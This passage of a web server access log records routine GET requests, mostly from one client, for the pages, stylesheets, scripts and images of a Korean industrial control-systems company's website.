AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:34 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:37:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:39:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:40:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.well-known/traffic-advice" [Client 66.249.82.70] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Chrome Privacy Preserving Prefetch Proxy" "-" +[18/Feb/2026:21:41:04 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 162.120.184.40] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:41:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:07 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 193.186.4.167] [Length 10540] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.google.com/" +[18/Feb/2026:21:42:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:21:42:11 +0000] - 200 200 - GET 